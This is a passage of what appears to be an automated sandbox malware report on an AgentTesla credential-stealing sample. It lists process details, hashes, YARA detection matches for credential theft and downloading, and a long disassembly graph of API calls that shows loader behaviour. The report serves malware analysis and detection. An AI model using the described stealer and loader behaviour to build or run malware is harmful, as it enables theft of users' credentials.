                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:5
                                    Start time:11:03:14
                                    Start date:06/01/2025
                                    Path:C:\Users\user\AppData\Local\enterogenous\cunila.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Local\enterogenous\cunila.exe"
                                    Imagebase:0x520000
                                    File size:892'416 bytes
                                    MD5 hash:A885A9C7468691538B78D54852B5A59C
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:6
                                    Start time:11:03:15
                                    Start date:06/01/2025
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Local\enterogenous\cunila.exe"
                                    Imagebase:0x680000
                                    File size:45'984 bytes
                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.4471177683.0000000002B7E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.4471177683.0000000002B66000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:false

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:2.4%
                                      Dynamic/Decrypted Code Coverage:1.1%
                                      Signature Coverage:5.2%
                                      Total number of Nodes:1624
                                      Total number of Limit Nodes:40
                                      execution_graph 96862 13945d8 96876 13921f8 96862->96876 96864 139468d 96879 13944c8 96864->96879 96866 13946b6 CreateFileW 96868 139470a 96866->96868 96875 1394705 96866->96875 96869 1394721 VirtualAlloc 96868->96869 96868->96875 96870 1394742 ReadFile 96869->96870 96869->96875 96871 139475d 96870->96871 96870->96875 96872 1393268 12 API calls 96871->96872 96873 1394777 96872->96873 96874 13934c8 GetPEB GetPEB 96873->96874 96874->96875 96882 13956d8 GetPEB 96876->96882 96878 1392883 96878->96864 96880 13944d1 Sleep 96879->96880 96881 13944df 96880->96881 96883 1395702 96882->96883 96883->96878 96884 881cad SystemParametersInfoW 96885 8b8402 96890 8b81be 96885->96890 96889 8b842a 96895 8b81ef try_get_first_available_module 96890->96895 96892 8b83ee 96909 8b27ec 26 API calls pre_c_initialization 96892->96909 96894 8b8343 96894->96889 96902 8c0984 96894->96902 96898 8b8338 96895->96898 96905 8a8e0b 40 API calls 2 library calls 96895->96905 96897 8b838c 96897->96898 96906 8a8e0b 40 API calls 2 library calls 96897->96906 96898->96894 96908 8af2d9 20 API calls _free 96898->96908 96900 8b83ab 96900->96898 96907 8a8e0b 40 API calls 2 library calls 96900->96907 96910 8c0081 96902->96910 96904 8c099f 96904->96889 96905->96897 96906->96900 96907->96898 96908->96892 96909->96894 96911 8c008d ___scrt_is_nonwritable_in_current_image 96910->96911 96912 8c009b 96911->96912 96915 8c00d4 96911->96915 96968 8af2d9 20 API calls _free 96912->96968 96914 8c00a0 96969 8b27ec 26 API calls pre_c_initialization 96914->96969 96921 8c065b 96915->96921 96920 8c00aa __wsopen_s 96920->96904 96971 8c042f 96921->96971 96924 8c068d 97003 8af2c6 20 API calls _free 96924->97003 96925 8c06a6 96989 8b5221 96925->96989 96928 8c0692 97004 8af2d9 20 API calls _free 96928->97004 96929 8c06ab 96930 8c06cb 96929->96930 96931 8c06b4 96929->96931 97002 8c039a CreateFileW 96930->97002 97005 8af2c6 20 API calls _free 96931->97005 96935 8c06b9 97006 8af2d9 20 API calls _free 96935->97006 96937 8c0781 GetFileType 96938 8c078c GetLastError 96937->96938 96939 8c07d3 96937->96939 97009 8af2a3 20 API calls 2 library calls 96938->97009 97011 8b516a 21 API calls 3 library calls 96939->97011 96940 8c0756 GetLastError 97008 8af2a3 20 API calls 2 library calls 96940->97008 96942 8c0704 96942->96937 96942->96940 97007 8c039a CreateFileW 96942->97007 96944 8c079a CloseHandle 96944->96928 96946 8c07c3 96944->96946 97010 8af2d9 20 API calls _free 96946->97010 96948 8c0749 96948->96937 96948->96940 96950 8c07f4 96952 8c0840 96950->96952 97012 8c05ab 72 API calls 4 library calls 96950->97012 96951 8c07c8 96951->96928 96956 8c086d 96952->96956 97013 8c014d 72 API calls 4 library calls 96952->97013 96955 8c0866 96955->96956 96957 8c087e 96955->96957 97014 8b86ae 96956->97014 96959 8c00f8 96957->96959 96960 8c08fc CloseHandle 96957->96960 96970 8c0121 RtlLeaveCriticalSection __wsopen_s 96959->96970 97029 8c039a CreateFileW 96960->97029 96962 8c0927 96963 8c0931 GetLastError 96962->96963 96964 8c095d 96962->96964 97030 8af2a3 20 API calls 2 library calls 96963->97030 96964->96959 96966 8c093d 97031 8b5333 21 API calls 3 library calls 96966->97031 96968->96914 96969->96920 96970->96920 96972 8c046a 96971->96972 96973 8c0450 96971->96973 97032 8c03bf 96972->97032 96973->96972 97039 8af2d9 20 API calls _free 96973->97039 96976 8c04a2 96979 8c04d1 96976->96979 97041 8af2d9 20 API calls _free 96976->97041 96977 8c045f 97040 8b27ec 26 API calls pre_c_initialization 96977->97040 96987 8c0524 96979->96987 97043 8ad70d 26 API calls 2 library calls 96979->97043 96982 8c051f 96984 8c059e 96982->96984 96982->96987 96983 8c04c6 97042 8b27ec 26 API calls pre_c_initialization 96983->97042 97044 8b27fc 11 API calls _abort 96984->97044 96987->96924 96987->96925 96988 8c05aa 96990 8b522d ___scrt_is_nonwritable_in_current_image 96989->96990 97047 8b2f5e RtlEnterCriticalSection 96990->97047 96992 8b5259 97051 8b5000 96992->97051 96993 8b5234 96993->96992 96997 8b52c7 RtlEnterCriticalSection 96993->96997 96999 8b527b 96993->96999 96996 8b52a4 __wsopen_s 96996->96929 96997->96999 97000 8b52d4 RtlLeaveCriticalSection 96997->97000 97048 8b532a 96999->97048 97000->96993 97002->96942 97003->96928 97004->96959 97005->96935 97006->96928 97007->96948 97008->96928 97009->96944 97010->96951 97011->96950 97012->96952 97013->96955 97077 8b53c4 97014->97077 97016 8b86be 97017 8b86c4 97016->97017 97019 8b53c4 __wsopen_s 26 API calls 97016->97019 97028 8b86f6 97016->97028 97090 8b5333 21 API calls 3 library calls 97017->97090 97022 8b86ed 97019->97022 97020 8b53c4 __wsopen_s 26 API calls 97023 8b8702 CloseHandle 97020->97023 97021 8b871c 97024 8b873e 97021->97024 97091 8af2a3 20 API calls 2 library calls 97021->97091 97025 8b53c4 __wsopen_s 26 API calls 97022->97025 97023->97017 97026 8b870e GetLastError 97023->97026 97024->96959 97025->97028 97026->97017 97028->97017 97028->97020 97029->96962 97030->96966 97031->96964 97034 8c03d7 97032->97034 97033 8c03f2 97033->96976 97034->97033 97045 8af2d9 20 API calls _free 97034->97045 97036 8c0416 97046 8b27ec 26 API calls pre_c_initialization 97036->97046 97038 8c0421 97038->96976 97039->96977 97040->96972 97041->96983 97042->96979 97043->96982 97044->96988 97045->97036 97046->97038 97047->96993 97059 8b2fa6 RtlLeaveCriticalSection 97048->97059 97050 8b5331 97050->96996 97060 8b4c7d 97051->97060 97053 8b5012 97057 8b501f 97053->97057 97067 8b3405 11 API calls 2 library calls 97053->97067 97056 8b5071 97056->96999 97058 8b5147 RtlEnterCriticalSection 97056->97058 97068 8b29c8 97057->97068 97058->96999 97059->97050 97065 8b4c8a _free 97060->97065 97061 8b4cca 97075 8af2d9 20 API calls _free 97061->97075 97062 8b4cb5 RtlAllocateHeap 97063 8b4cc8 97062->97063 97062->97065 97063->97053 97065->97061 97065->97062 97074 8a4ead 7 API calls 2 library calls 97065->97074 97067->97053 97069 8b29d3 RtlFreeHeap 97068->97069 97073 8b29fc _free 97068->97073 97070 8b29e8 97069->97070 97069->97073 97076 8af2d9 20 API calls _free 97070->97076 97072 8b29ee GetLastError 97072->97073 97073->97056 97074->97065 97075->97063 97076->97072 97078 8b53d1 97077->97078 97079 8b53e6 97077->97079 97092 8af2c6 20 API calls _free 97078->97092 97084 8b540b 97079->97084 97094 8af2c6 20 API calls _free 97079->97094 97081 8b53d6 97093 8af2d9 20 API calls _free 97081->97093 97084->97016 97085 8b5416 97095 8af2d9 20 API calls _free 97085->97095 97087 8b53de 97087->97016 97088 8b541e 97096 8b27ec 26 API calls pre_c_initialization 97088->97096 97090->97021 97091->97024 97092->97081 97093->97087 97094->97085 97095->97088 97096->97087 97097 8c2ba5 97098 8c2baf 97097->97098 97099 882b25 97097->97099 97140 883a5a 97098->97140 97125 882b83 7 API calls 97099->97125 97103 8c2bb8 97147 889cb3 97103->97147 97106 882b2f 97115 882b44 97106->97115 97129 883837 97106->97129 97107 8c2bc6 97108 8c2bce 97107->97108 97109 8c2bf5 97107->97109 97153 8833c6 97108->97153 97110 8833c6 22 API calls 97109->97110 97123 8c2bf1 GetForegroundWindow ShellExecuteW 97110->97123 97116 882b5f 97115->97116 97139 8830f2 Shell_NotifyIconW ___scrt_fastfail 97115->97139 97121 882b66 SetCurrentDirectoryW 97116->97121 97120 8833c6 22 API calls 97120->97123 97124 882b7a 97121->97124 97122 8c2c26 97122->97116 97123->97122 97171 882cd4 GetSysColorBrush RegisterClassExW RegisterClipboardFormatW 97125->97171 97128 882c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97128->97106 97130 883862 ___scrt_fastfail 97129->97130 97175 884212 97130->97175 97133 8838e8 97135 8c3386 Shell_NotifyIconW 97133->97135 97136 883906 Shell_NotifyIconW 97133->97136 97179 883923 97136->97179 97138 88391c 97138->97115 97139->97116 97269 8c1f50 97140->97269 97143 889cb3 22 API calls 97144 883a8d 97143->97144 97271 883aa2 97144->97271 97146 883a97 97146->97103 97148 889cc2 _wcslen 97147->97148 97149 89fe0b 22 API calls 97148->97149 97150 889cea __fread_nolock 97149->97150 97151 89fddb 22 API calls 97150->97151 97152 889d00 97151->97152 97152->97107 97154 8833dd 97153->97154 97155 8c30bb 97153->97155 97291 8833ee 97154->97291 97157 89fddb 22 API calls 97155->97157 97159 8c30c5 _wcslen 97157->97159 97158 8833e8 97162 886350 97158->97162 97160 89fe0b 22 API calls 97159->97160 97161 8c30fe __fread_nolock 97160->97161 97163 886362 97162->97163 97164 8c4a51 97162->97164 97306 886373 97163->97306 97316 884a88 22 API calls __fread_nolock 97164->97316 97167 88636e 97167->97120 97168 8c4a5b 97169 8c4a67 97168->97169 97170 88a8c7 22 API calls 97168->97170 97170->97169 97172 882d65 LoadIconW 97171->97172 97174 882b2a 97172->97174 97174->97128 97176 8c35a4 97175->97176 97177 8838b7 97175->97177 97176->97177 97178 8c35ad DestroyCursor 97176->97178 97177->97133 97201 8ec874 42 API calls _strftime 97177->97201 97178->97177 97180 88393f 97179->97180 97199 883a13 97179->97199 97202 886270 97180->97202 97183 88395a 97207 886b57 97183->97207 97184 8c3393 LoadStringW 97186 8c33ad 97184->97186 97194 883994 ___scrt_fastfail 97186->97194 97219 88a8c7 97186->97219 97187 88396f 97188 88397c 97187->97188 97189 8c33c9 97187->97189 97188->97186 97191 883986 97188->97191 97192 886350 22 API calls 97189->97192 97193 886350 22 API calls 97191->97193 97195 8c33d7 97192->97195 97193->97194 97197 8839f9 Shell_NotifyIconW 97194->97197 97195->97194 97196 8833c6 22 API calls 97195->97196 97198 8c33f9 97196->97198 97197->97199 97200 8833c6 22 API calls 97198->97200 97199->97138 97200->97194 97201->97133 97223 89fe0b 97202->97223 97204 886295 97233 89fddb 97204->97233 97206 88394d 97206->97183 97206->97184 97208 8c4ba1 97207->97208 97209 886b67 _wcslen 97207->97209 97259 8893b2 97208->97259 97212 886b7d 97209->97212 97213 886ba2 97209->97213 97211 8c4baa 97211->97211 97258 886f34 22 API calls 97212->97258 97215 89fddb 22 API calls 97213->97215 97216 886bae 97215->97216 97218 89fe0b 22 API calls 97216->97218 97217 886b85 __fread_nolock 97217->97187 97218->97217 97220 88a8db 97219->97220 97222 88a8ea __fread_nolock 97219->97222 97221 89fe0b 22 API calls 97220->97221 97220->97222 97221->97222 97222->97194 97225 89fddb 97223->97225 97226 89fdfa 97225->97226 97229 89fdfc 97225->97229 97243 8aea0c 97225->97243 97250 8a4ead 7 API calls 2 library calls 97225->97250 97226->97204 97228 8a066d 97252 8a32a4 RaiseException 97228->97252 97229->97228 97251 8a32a4 RaiseException 97229->97251 97231 8a068a 97231->97204 97236 89fde0 97233->97236 97234 8aea0c ___std_exception_copy 21 API calls 97234->97236 97235 89fdfa 97235->97206 97236->97234 97236->97235 97238 89fdfc 97236->97238 97255 8a4ead 7 API calls 2 library calls 97236->97255 97239 8a066d 97238->97239 97256 8a32a4 RaiseException 97238->97256 97257 8a32a4 RaiseException 97239->97257 97242 8a068a 97242->97206 97248 8b3820 _free 97243->97248 97244 8b385e 97254 8af2d9 20 API calls _free 97244->97254 97246 8b3849 RtlAllocateHeap 97247 8b385c 97246->97247 97246->97248 97247->97225 97248->97244 97248->97246 97253 8a4ead 7 API calls 2 library calls 97248->97253 97250->97225 97251->97228 97252->97231 97253->97248 97254->97247 97255->97236 97256->97239 97257->97242 97258->97217 97260 8893c0 97259->97260 97262 8893c9 __fread_nolock 97259->97262 97260->97262 97263 88aec9 97260->97263 97262->97211 97264 88aedc 97263->97264 97268 88aed9 __fread_nolock 97263->97268 97265 89fddb 22 API calls 97264->97265 97266 88aee7 97265->97266 97267 89fe0b 22 API calls 97266->97267 97267->97268 97268->97262 97270 883a67 GetModuleFileNameW 97269->97270 97270->97143 97272 8c1f50 __wsopen_s 97271->97272 97273 883aaf GetFullPathNameW 97272->97273 97274 883ae9 97273->97274 97275 883ace 97273->97275 97285 88a6c3 97274->97285 97277 886b57 22 API calls 97275->97277 97278 883ada 97277->97278 97281 8837a0 97278->97281 97282 8837ae 97281->97282 97283 8893b2 22 API calls 97282->97283 97284 8837c2 97283->97284 97284->97146 97286 88a6dd 97285->97286 97290 88a6d0 97285->97290 97287 89fddb 22 API calls 97286->97287 97288 88a6e7 97287->97288 97289 89fe0b 22 API calls 97288->97289 97289->97290 97290->97278 97292 8833fe _wcslen 97291->97292 97293 8c311d 97292->97293 97294 883411 97292->97294 97296 89fddb 22 API calls 97293->97296 97301 88a587 97294->97301 97298 8c3127 97296->97298 97297 88341e __fread_nolock 97297->97158 97299 89fe0b 22 API calls 97298->97299 97300 8c3157 __fread_nolock 97299->97300 97302 88a59d 97301->97302 97305 88a598 __fread_nolock 97301->97305 97303 89fe0b 22 API calls 97302->97303 97304 8cf80f 97302->97304 97303->97305 97305->97297 97307 8863b6 __fread_nolock 97306->97307 97308 886382 97306->97308 97307->97167 97308->97307 97309 8c4a82 97308->97309 97310 8863a9 97308->97310 97312 89fddb 22 API calls 97309->97312 97311 88a587 22 API calls 97310->97311 97311->97307 97313 8c4a91 97312->97313 97314 89fe0b 22 API calls 97313->97314 97315 8c4ac5 __fread_nolock 97314->97315 97316->97168 97317 882de3 97318 882df0 __wsopen_s 97317->97318 97319 882e09 97318->97319 97323 8c2c2b ___scrt_fastfail 97318->97323 97320 883aa2 23 API calls 97319->97320 97321 882e12 97320->97321 97331 882da5 97321->97331 97326 886b57 22 API calls 97323->97326 97328 8c2cab 97326->97328 97327 882e27 97349 8844a8 97327->97349 97328->97328 97332 8c1f50 __wsopen_s 97331->97332 97333 882db2 GetLongPathNameW 97332->97333 97334 886b57 22 API calls 97333->97334 97335 882dda 97334->97335 97336 883598 97335->97336 97379 88a961 97336->97379 97339 883aa2 23 API calls 97340 8835b5 97339->97340 97341 8835c0 97340->97341 97345 8c32eb 97340->97345 97384 88515f 97341->97384 97346 8c330d 97345->97346 97396 89ce60 41 API calls 97345->97396 97348 8835df 97348->97327 97397 884ecb 97349->97397 97352 8c3833 97419 8f2cf9 97352->97419 97353 884ecb 94 API calls 97355 8844e1 97353->97355 97355->97352 97357 8844e9 97355->97357 97356 8c3848 97358 8c384c 97356->97358 97359 8c3869 97356->97359 97361 8c3854 97357->97361 97362 8844f5 97357->97362 97363 884f39 68 API calls 97358->97363 97360 89fe0b 22 API calls 97359->97360 97378 8c38ae 97360->97378 97466 8eda5a 82 API calls 97361->97466 97465 88940c 136 API calls 2 library calls 97362->97465 97363->97361 97366 882e31 97367 8c3862 97367->97359 97369 8c3a5f 97373 8c3a89 97369->97373 97459 884f39 97369->97459 97373->97369 97470 8e989b 82 API calls __wsopen_s 97373->97470 97375 889cb3 22 API calls 97375->97378 97378->97369 97378->97373 97378->97375 97445 88a4a1 97378->97445 97453 883ff7 97378->97453 97467 8e967e 22 API calls __fread_nolock 97378->97467 97468 8e95ad 42 API calls _wcslen 97378->97468 97469 8f0b5a 22 API calls 97378->97469 97380 89fe0b 22 API calls 97379->97380 97381 88a976 97380->97381 97382 89fddb 22 API calls 97381->97382 97383 8835aa 97382->97383 97383->97339 97385 88516e 97384->97385 97389 88518f __fread_nolock 97384->97389 97387 89fe0b 22 API calls 97385->97387 97386 89fddb 22 API calls 97388 8835cc 97386->97388 97387->97389 97390 8835f3 97388->97390 97389->97386 97391 883605 97390->97391 97395 883624 __fread_nolock 97390->97395 97393 89fe0b 22 API calls 97391->97393 97392 89fddb 22 API calls 97394 88363b 97392->97394 97393->97395 97394->97348 97395->97392 97396->97345 97471 884e90 LoadLibraryA 97397->97471 97402 8c3ccf 97405 884f39 68 API calls 97402->97405 97403 884ef6 LoadLibraryExW 97479 884e59 LoadLibraryA 97403->97479 97407 8c3cd6 97405->97407 97409 884e59 3 API calls 97407->97409 97411 8c3cde 97409->97411 97410 884f20 97410->97411 97412 884f2c 97410->97412 97501 8850f5 97411->97501 97414 884f39 68 API calls 97412->97414 97416 8844cd 97414->97416 97416->97352 97416->97353 97418 8c3d05 97420 8f2d15 97419->97420 97421 88511f 64 API calls 97420->97421 97422 8f2d29 97421->97422 97635 8f2e66 97422->97635 97425 8f2d3f 97425->97356 97426 8850f5 40 API calls 97427 8f2d56 97426->97427 97428 8850f5 40 API calls 97427->97428 97429 8f2d66 97428->97429 97430 8850f5 40 API calls 97429->97430 97431 8f2d81 97430->97431 97432 8850f5 40 API calls 97431->97432 97433 8f2d9c 97432->97433 97434 88511f 64 API calls 97433->97434 97435 8f2db3 97434->97435 97436 8aea0c ___std_exception_copy 21 API calls 97435->97436 97437 8f2dba 97436->97437 97438 8aea0c ___std_exception_copy 21 API calls 97437->97438 97439 8f2dc4 97438->97439 97440 8850f5 40 API calls 97439->97440 97441 8f2dd8 97440->97441 97442 8f28fe 27 API calls 97441->97442 97443 8f2dee 97442->97443 97443->97425 97641 8f22ce 79 API calls 97443->97641 97446 88a52b 97445->97446 97452 88a4b1 __fread_nolock 97445->97452 97448 89fe0b 22 API calls 97446->97448 97447 89fddb 22 API calls 97449 88a4b8 97447->97449 97448->97452 97450 88a4d6 97449->97450 97451 89fddb 22 API calls 97449->97451 97450->97378 97451->97450 97452->97447 97454 88400a 97453->97454 97457 8840ae 97453->97457 97455 89fe0b 22 API calls 97454->97455 97458 88403c 97454->97458 97455->97458 97456 89fddb 22 API calls 97456->97458 97457->97378 97458->97456 97458->97457 97460 884f43 97459->97460 97462 884f4a 97459->97462 97642 8ae678 97460->97642 97463 884f59 97462->97463 97464 884f6a FreeLibrary 97462->97464 97463->97369 97464->97463 97465->97366 97466->97367 97467->97378 97468->97378 97469->97378 97470->97373 97472 884ea8 GetProcAddress 97471->97472 97473 884ec6 97471->97473 97474 884eb8 97472->97474 97476 8ae5eb 97473->97476 97474->97473 97475 884ebf FreeLibrary 97474->97475 97475->97473 97509 8ae52a 97476->97509 97478 884eea 97478->97402 97478->97403 97480 884e8d 97479->97480 97481 884e6e GetProcAddress 97479->97481 97484 884f80 97480->97484 97482 884e7e 97481->97482 97482->97480 97483 884e86 FreeLibrary 97482->97483 97483->97480 97485 89fe0b 22 API calls 97484->97485 97486 884f95 97485->97486 97561 885722 97486->97561 97488 884fa1 __fread_nolock 97489 8c3d1d 97488->97489 97490 8850a5 97488->97490 97500 884fdc 97488->97500 97575 8f304d 74 API calls 97489->97575 97564 8842a2 CreateStreamOnHGlobal 97490->97564 97493 8c3d22 97495 88511f 64 API calls 97493->97495 97494 8850f5 40 API calls 97494->97500 97496 8c3d45 97495->97496 97497 8850f5 40 API calls 97496->97497 97498 88506e messages 97497->97498 97498->97410 97500->97493 97500->97494 97500->97498 97570 88511f 97500->97570 97502 8c3d70 97501->97502 97503 885107 97501->97503 97597 8ae8c4 97503->97597 97506 8f28fe 97618 8f274e 97506->97618 97508 8f2919 97508->97418 97512 8ae536 ___scrt_is_nonwritable_in_current_image 97509->97512 97510 8ae544 97534 8af2d9 20 API calls _free 97510->97534 97512->97510 97514 8ae574 97512->97514 97513 8ae549 97535 8b27ec 26 API calls pre_c_initialization 97513->97535 97516 8ae579 97514->97516 97517 8ae586 97514->97517 97536 8af2d9 20 API calls _free 97516->97536 97526 8b8061 97517->97526 97520 8ae58f 97521 8ae5a2 97520->97521 97522 8ae595 97520->97522 97538 8ae5d4 RtlLeaveCriticalSection __fread_nolock 97521->97538 97537 8af2d9 20 API calls _free 97522->97537 97524 8ae554 __wsopen_s 97524->97478 97527 8b806d ___scrt_is_nonwritable_in_current_image 97526->97527 97539 8b2f5e RtlEnterCriticalSection 97527->97539 97529 8b807b 97540 8b80fb 97529->97540 97533 8b80ac __wsopen_s 97533->97520 97534->97513 97535->97524 97536->97524 97537->97524 97538->97524 97539->97529 97541 8b811e 97540->97541 97542 8b8177 97541->97542 97548 8b8088 97541->97548 97556 8a918d RtlEnterCriticalSection 97541->97556 97557 8a91a1 RtlLeaveCriticalSection 97541->97557 97543 8b4c7d _free 20 API calls 97542->97543 97544 8b8180 97543->97544 97546 8b29c8 _free 20 API calls 97544->97546 97547 8b8189 97546->97547 97547->97548 97558 8b3405 11 API calls 2 library calls 97547->97558 97553 8b80b7 97548->97553 97551 8b81a8 97559 8a918d RtlEnterCriticalSection 97551->97559 97560 8b2fa6 RtlLeaveCriticalSection 97553->97560 97555 8b80be 97555->97533 97556->97541 97557->97541 97558->97551 97559->97548 97560->97555 97562 89fddb 22 API calls 97561->97562 97563 885734 97562->97563 97563->97488 97565 8842d9 97564->97565 97566 8842bc FindResourceExW 97564->97566 97565->97500 97566->97565 97567 8c35ba LoadResource 97566->97567 97567->97565 97568 8c35cf SizeofResource 97567->97568 97568->97565 97569 8c35e3 LockResource 97568->97569 97569->97565 97571 88512e 97570->97571 97574 8c3d90 97570->97574 97576 8aece3 97571->97576 97575->97493 97579 8aeaaa 97576->97579 97578 88513c 97578->97500 97583 8aeab6 ___scrt_is_nonwritable_in_current_image 97579->97583 97580 8aeac2 97592 8af2d9 20 API calls _free 97580->97592 97582 8aeae8 97594 8a918d RtlEnterCriticalSection 97582->97594 97583->97580 97583->97582 97584 8aeac7 97593 8b27ec 26 API calls pre_c_initialization 97584->97593 97587 8aeaf4 97595 8aec0a 62 API calls 2 library calls 97587->97595 97589 8aeb08 97596 8aeb27 RtlLeaveCriticalSection __fread_nolock 97589->97596 97591 8aead2 __wsopen_s 97591->97578 97592->97584 97593->97591 97594->97587 97595->97589 97596->97591 97600 8ae8e1 97597->97600 97599 885118 97599->97506 97601 8ae8ed ___scrt_is_nonwritable_in_current_image 97600->97601 97602 8ae92d 97601->97602 97603 8ae925 __wsopen_s 97601->97603 97605 8ae900 ___scrt_fastfail 97601->97605 97615 8a918d RtlEnterCriticalSection 97602->97615 97603->97599 97613 8af2d9 20 API calls _free 97605->97613 97606 8ae937 97616 8ae6f8 38 API calls 4 library calls 97606->97616 97609 8ae91a 97614 8b27ec 26 API calls pre_c_initialization 97609->97614 97610 8ae94e 97617 8ae96c RtlLeaveCriticalSection __fread_nolock 97610->97617 97613->97609 97614->97603 97615->97606 97616->97610 97617->97603 97621 8ae4e8 97618->97621 97620 8f275d 97620->97508 97624 8ae469 97621->97624 97623 8ae505 97623->97620 97625 8ae478 97624->97625 97626 8ae48c 97624->97626 97632 8af2d9 20 API calls _free 97625->97632 97631 8ae488 __alldvrm 97626->97631 97634 8b333f 11 API calls 2 library calls 97626->97634 97628 8ae47d 97633 8b27ec 26 API calls pre_c_initialization 97628->97633 97631->97623 97632->97628 97633->97631 97634->97631 97639 8f2e7a 97635->97639 97636 8f2d3b 97636->97425 97636->97426 97637 8850f5 40 API calls 97637->97639 97638 8f28fe 27 API calls 97638->97639 97639->97636 97639->97637 97639->97638 97640 88511f 64 API calls 97639->97640 97640->97639 97641->97425 97643 8ae684 ___scrt_is_nonwritable_in_current_image 97642->97643 97644 8ae6aa 97643->97644 97645 8ae695 97643->97645 97646 8ae6a5 __wsopen_s 97644->97646 97655 8a918d RtlEnterCriticalSection 97644->97655 97672 8af2d9 20 API calls _free 97645->97672 97646->97462 97649 8ae69a 97673 8b27ec 26 API calls pre_c_initialization 97649->97673 97650 8ae6c6 97656 8ae602 97650->97656 97653 8ae6d1 97674 8ae6ee RtlLeaveCriticalSection __fread_nolock 97653->97674 97655->97650 97657 8ae60f 97656->97657 97658 8ae624 97656->97658 97707 8af2d9 20 API calls _free 97657->97707 97665 8ae61f 97658->97665 97675 8adc0b 97658->97675 97660 8ae614 97708 8b27ec 26 API calls pre_c_initialization 97660->97708 97665->97653 97668 8ae646 97692 8b862f 97668->97692 97671 8b29c8 _free 20 API calls 97671->97665 97672->97649 97673->97646 97674->97646 97676 8adc1f 97675->97676 97677 8adc23 97675->97677 97681 8b4d7a 97676->97681 97677->97676 97678 8ad955 __fread_nolock 26 API calls 97677->97678 97679 8adc43 97678->97679 97709 8b59be 62 API calls 5 library calls 97679->97709 97682 8b4d90 97681->97682 97683 8ae640 97681->97683 97682->97683 97684 8b29c8 _free 20 API calls 97682->97684 97685 8ad955 97683->97685 97684->97683 97686 8ad961 97685->97686 97687 8ad976 97685->97687 97710 8af2d9 20 API calls _free 97686->97710 97687->97668 97689 8ad966 97711 8b27ec 26 API calls pre_c_initialization 97689->97711 97691 8ad971 97691->97668 97693 8b863e 97692->97693 97694 8b8653 97692->97694 97715 8af2c6 20 API calls _free 97693->97715 97695 8b868e 97694->97695 97699 8b867a 97694->97699 97717 8af2c6 20 API calls _free 97695->97717 97698 8b8643 97716 8af2d9 20 API calls _free 97698->97716 97712 8b8607 97699->97712 97700 8b8693 97718 8af2d9 20 API calls _free 97700->97718 97704 8ae64c 97704->97665 97704->97671 97705 8b869b 97719 8b27ec 26 API calls pre_c_initialization 97705->97719 97707->97660 97708->97665 97709->97676 97710->97689 97711->97691 97720 8b8585 97712->97720 97714 8b862b 97714->97704 97715->97698 97716->97704 97717->97700 97718->97705 97719->97704 97721 8b8591 ___scrt_is_nonwritable_in_current_image 97720->97721 97731 8b5147 RtlEnterCriticalSection 97721->97731 97723 8b859f 97724 8b85d1 97723->97724 97725 8b85c6 97723->97725 97732 8af2d9 20 API calls _free 97724->97732 97727 8b86ae __wsopen_s 29 API calls 97725->97727 97728 8b85cc 97727->97728 97733 8b85fb RtlLeaveCriticalSection __wsopen_s 97728->97733 97730 8b85ee __wsopen_s 97730->97714 97731->97723 97732->97728 97733->97730 97734 8d3a41 97738 8f10c0 97734->97738 97736 8d3a4c 97737 8f10c0 53 API calls 97736->97737 97737->97736 97739 8f10cd 97738->97739 97748 8f10fa 97738->97748 97740 8f10fc 97739->97740 97741 8f1101 97739->97741 97746 8f10f4 97739->97746 97739->97748 97773 89fa11 53 API calls 97740->97773 97749 887510 97741->97749 97745 886350 22 API calls 97745->97748 97772 88b270 39 API calls 97746->97772 97748->97736 97750 887525 97749->97750 97767 887522 97749->97767 97751 88755b 97750->97751 97752 88752d 97750->97752 97754 8c50f6 97751->97754 97757 88756d 97751->97757 97763 8c500f 97751->97763 97774 8a51c6 26 API calls 97752->97774 97777 8a5183 26 API calls 97754->97777 97755 88753d 97762 89fddb 22 API calls 97755->97762 97775 89fb21 51 API calls 97757->97775 97759 8c5088 97776 89fb21 51 API calls 97759->97776 97760 8c510e 97760->97760 97764 887547 97762->97764 97763->97759 97766 89fe0b 22 API calls 97763->97766 97765 889cb3 22 API calls 97764->97765 97765->97767 97769 8c5058 97766->97769 97767->97745 97768 89fddb 22 API calls 97770 8c507f 97768->97770 97769->97768 97771 889cb3 22 API calls 97770->97771 97771->97759 97772->97748 97773->97741 97774->97755 97775->97755 97776->97754 97777->97760 97778 881044 97783 8810f3 97778->97783 97780 88104a 97819 8a00a3 29 API calls __onexit 97780->97819 97782 881054 97820 881398 97783->97820 97787 88116a 97788 88a961 22 API calls 97787->97788 97789 881174 97788->97789 97790 88a961 22 API calls 97789->97790 97791 88117e 97790->97791 